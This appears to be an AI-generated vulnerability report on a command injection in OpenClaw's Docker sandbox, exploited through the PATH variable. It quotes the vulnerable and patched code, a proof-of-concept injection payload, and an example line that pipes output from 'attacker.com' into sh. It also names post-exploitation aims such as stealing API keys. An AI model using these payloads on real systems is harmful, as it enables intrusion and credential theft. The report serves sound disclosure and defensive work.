CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-24763

OpenClaw Command Injection: When the PATH Leads to RCE

Alon Barad
Alon Barad
Software Engineer

Feb 3, 2026·6 min read·109 visits

Executive Summary (TL;DR)

A command injection flaw in OpenClaw's Docker execution logic allowed attackers to inject malicious shell commands via the 'PATH' environment variable. This results in Remote Code Execution (RCE) within the Docker container.

OpenClaw (formerly Clawdbot), a self-hosted AI assistant, contained a critical OS Command Injection vulnerability in its Docker sandbox implementation. By failing to properly sanitize user-supplied environment variables—specifically the 'PATH'—before interpolating them into a shell command string, the application allowed authenticated users to execute arbitrary commands inside the container. This effectively turns the AI assistant into a remote shell for any user with basic access permissions.

The Hook: Trusting the AI with the Keys

We live in a world where we want our AI assistants to do everything for us: write code, deploy apps, and maybe even fix our terrible infrastructure. OpenClaw (formerly Clawdbot) is one of those eager digital butlers, designed to run on your own hardware and execute tasks in a "sandboxed" environment. The idea is sound: wrap the dangerous stuff in Docker so if the AI goes rogue (or simply hallucinates rm -rf /), your host machine survives.

However, building a sandbox is like building a prison; if you leave the guard tower unmanned, the inmates run the asylum. In OpenClaw's case, the mechanism used to construct the execution environment for these Docker containers had a gaping hole. It trusted the user to define environment variables without considering that in the world of shell scripting, a string isn't always just a string—sometimes, it's a command waiting to happen.

This vulnerability isn't some complex heap overflow requiring precise memory alignment. It's a classic logic error: taking untrusted input and pasting it directly into a shell command. It’s the software equivalent of signing a blank check and handing it to a stranger.

The Flaw: Interpolation is the Root of All Evil

The vulnerability lies deep within src/agents/bash-tools.shared.ts, in a function specifically tasked with building arguments for docker exec. The goal was simple: allow the user (or the agent) to specify a custom PATH variable so the container could find specific tools. Seems harmless, right?

The developers made a fatal mistake: they constructed the shell command using JavaScript string interpolation. They took the user-supplied PATH and dropped it directly into a string that would be passed to sh -lc.

Here is the logic: existing shell syntax dictates that backticks, semicolons, and dollar signs ($) have special meaning. When you write code that says export PATH="${UserInput}:$PATH", you are praying that UserInput doesn't contain a closing quote followed by ; wget attacker.com | sh. The flaw here is a fundamental misunderstanding of the boundary between data (the path string) and code (the shell command). By blurring this line, OpenClaw allowed data to become code.

The Code: The Smoking Gun

Let's look at the crime scene. The function buildDockerExecArgs is responsible for setting up the container command. Prior to version 2026.1.29, it looked something like this:

// The Vulnerable Code
const pathExport = params.env.PATH 
  ? `export PATH="${params.env.PATH}:$PATH"; ` // <--- HERE BE DRAGONS
  : "";
 
// Constructing the final command
args.push(params.containerName, "sh", "-lc", `${pathExport}${params.command}`);

Do you see the issue? The params.env.PATH variable is inserted directly into the template literal. If I set PATH to $(id), the resulting string passed to sh -lc becomes:

export PATH="$(id):$PATH"; [original_command]

The shell parses this, sees the command substitution $(id), executes id, and places the result into the PATH string. But if I use a semicolon, I can terminate the export command entirely and start a new one.

The fix, implemented in commit 771f23d36b95ec2204cc9a0054045f5d8439ea75, changes this approach entirely. Instead of pasting the string into the command, the developers switched to using Docker's native environment injection:

// The Fixed Code
if (hasCustomPath) {
  // Pass the dirty data via Docker flag, keeping it out of the shell string
  args.push("-e", `CLAWDBOT_PREPEND_PATH=${params.env.PATH}`);
}
 
const pathExport = hasCustomPath
  ? 'export PATH="${CLAWDBOT_PREPEND_PATH}:$PATH"; unset CLAWDBOT_PREPEND_PATH; '
  : "";

Notice the difference? The malicious string is now trapped inside an environment variable CLAWDBOT_PREPEND_PATH passed via the Docker API. The shell command inside the container references ${CLAWDBOT_PREPEND_PATH} literally. The shell expands the variable after parsing the command structure, treating the content as data, not executable syntax.

The Exploit: Breakout Time

Exploiting this is trivially easy for anyone with authenticated access to the agent interface. We don't need buffer overflows; we just need a semicolon.

Step 1: The Setup We need to trigger a function that utilizes the Docker sandbox. We intercept the request or use the API to modify the environment variables sent to the agent.

Step 2: The Payload We set our PATH variable to something spicy. A simple proof of concept would be:

/usr/bin:"; touch /tmp/pwned; #

Step 3: Execution The vulnerable JavaScript constructs the following command:

sh -lc "export PATH=\"/usr/bin:"; touch /tmp/pwned; #:$PATH\"; [original_command]"

Step 4: The Result The shell sees:

  1. export PATH="/usr/bin: (Valid command, though incomplete path)
  2. ; (End of command)
  3. touch /tmp/pwned (Our malicious payload executes)
  4. # (Comments out the rest of the original command so the syntax remains valid enough to run)

Boom. We have code execution inside the container. From here, we can dump environment variables (which often contain API keys for the AI models), pivot to other containers if the network is flat, or simply install a cryptominer and heat up the server room.

The Fix: Mitigation Strategies

The primary mitigation is obvious: Patch immediately. Update OpenClaw to version 2026.1.29 or later. The fix provided by the vendor is robust because it fundamentally changes how data is passed to the shell. By moving user input from the code channel (the command string) to the data channel (environment variables), the attack surface is neutralized.

If you cannot patch immediately, you are in a tight spot. You could try to implement a WAF rule or an input validation middleware that rejects any PATH variable containing characters like ", ;, $, or `. However, blacklisting characters is a losing game; hackers usually find a way around regexes (e.g., using octal representations or other shell tricks).

For developers reading this: Take this as a lesson. Never, ever interpolate user input into a shell string. If you must run shell commands, use execFile (which doesn't spawn a shell) or pass arguments as an array. If you absolutely must use a shell, pass untrusted data via environment variables, not as part of the command string.

Official Patches

OpenClawCommit fixing the injection vulnerability

Fix Analysis (1)

Technical Appendix

CVSS Score
8.8/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Affected Systems

OpenClaw (Self-hosted)Clawdbot (Legacy name)

Affected Versions Detail

Product
Affected Versions
Fixed Version
OpenClaw
OpenClaw
< 2026.1.292026.1.29
AttributeDetail
CWE IDCWE-78 (OS Command Injection)
CVSS Score8.8 (High)
Attack VectorNetwork (Authenticated)
ImpactConfidentiality, Integrity, Availability
Fix Commit771f23d36b95ec2204cc9a0054045f5d8439ea75
VendorOpenClaw

MITRE ATT&CK Mapping

T1059.004Command and Scripting Interpreter: Unix Shell
Execution
T1611Escape to Host (Potential)
Privilege Escalation
CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Known Exploits & Detection

Research AnalysisProof of Concept involves setting PATH to include shell metacharacters like semicolons or command substitutions.

Vulnerability Timeline

Fix committed by vendor
2026-01-27
Fixed version 2026.1.29 released
2026-01-29
CVE and GHSA Published
2026-02-02

References & Sources

  • [1]GitHub Security Advisory GHSA-mc68-q9jw-2h3v
  • [2]NVD Entry for CVE-2026-24763

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•6 minutes ago•CVE-2026-49866
7.5

CVE-2026-49866: CPU-Based Denial of Service in @libp2p/gossipsub Protobuf Parser

A high-severity denial-of-service vulnerability in @libp2p/gossipsub prior to version 16.0.0 allows unauthenticated remote attackers to trigger event loop starvation and complete node freeze by exploiting unbounded protobuf decoding limits and nested synchronous array iteration loops.

Amit Schendel
Amit Schendel
0 views•6 min read
•about 1 hour ago•CVE-2026-49858
5.9

CVE-2026-49858: Cross-User Attribute and Relation Leak in API Platform Core Serializers

CVE-2026-49858 is a vulnerability in API Platform Core's JSON:API and HAL item normalizers where conditionally secured attributes are cached globally in memory. When deployed in long-running PHP execution environments such as FrankenPHP worker mode, Swoole, or RoadRunner, this persistent caching bypasses property-level security constraints, allowing unprivileged users to access sensitive, unauthorized fields cached during privileged requests.

Alon Barad
Alon Barad
3 views•7 min read
•about 2 hours ago•CVE-2026-5078
5.3

CVE-2026-5078: Log Forging and Injection via :remote-user Token in Morgan Logging Middleware

CVE-2026-5078 is a log injection vulnerability in Morgan, the widely deployed Node.js HTTP request logging middleware. The vulnerability arises because the ':remote-user' logging token decodes and outputs basic authentication usernames containing control characters, such as Carriage Return (CR) and Line Feed (LF), without sanitization. An unauthenticated attacker can bypass native HTTP header parsers by Base64-encoding CRLF sequences in the Authorization header. When Morgan logs the request, these control characters force newlines in the log stream, enabling log forging, SIEM evasion, and system activity spoofing.

Alon Barad
Alon Barad
3 views•7 min read
•about 13 hours ago•CVE-2026-48861
2.1

CVE-2026-48861: HTTP Request Splitting and Smuggling via Method Parameter CRLF Injection in Elixir Mint

CVE-2026-48861 is a client-side HTTP request-line CRLF (Carriage Return Line Feed) injection vulnerability in the popular Elixir HTTP client library, Mint. The vulnerability permits HTTP Request Splitting and HTTP Request Smuggling when an application forwards untrusted, attacker-controlled inputs to Mint's HTTP client requests as either the HTTP request method or target. By embedding CRLF characters within these parameters, an attacker can terminate the request line prematurely, inject malicious headers, or pipeline entirely independent requests. These smuggled requests are then processed by upstream or downstream proxy servers as separate HTTP queries on the same TCP connection. While Mint version 1.7.0 introduced target validation to secure the request target, the HTTP request method parameter remained completely unvalidated. This flaw allows attackers to bypass routing filters, access restricted internal APIs, or poison HTTP caches under default configurations.

Amit Schendel
Amit Schendel
6 views•7 min read
•about 13 hours ago•CVE-2026-49753
6.3

CVE-2026-49753: HTTP Request/Response Smuggling via Inconsistent Content-Length Parsing in Elixir Mint Client

An Inconsistent Interpretation of HTTP Requests (HTTP Request/Response Smuggling) vulnerability in the Elixir Mint HTTP client allows attacker-controlled HTTP/1 servers to desynchronize response framing on shared connections due to over-lenient parsing of sign-prefixed Content-Length headers.

Amit Schendel
Amit Schendel
6 views•6 min read
•about 14 hours ago•CVE-2026-49754
8.2

CVE-2026-49754: Denial of Service via Unbounded HTTP/2 CONTINUATION Frame Accumulation in Elixir Mint

An allocation of resources without limits or throttling vulnerability in Elixir Mint allows an attacker-controlled HTTP/2 server to exhaust memory in a Mint client. The vulnerability is exploited by sending a HEADERS frame without the END_HEADERS flag followed by an infinite stream of CONTINUATION frames. Because the client lacks limits on the incoming header-block accumulator, the client continuously consumes memory until an out-of-memory crash occurs.

Amit Schendel
Amit Schendel
7 views•6 min read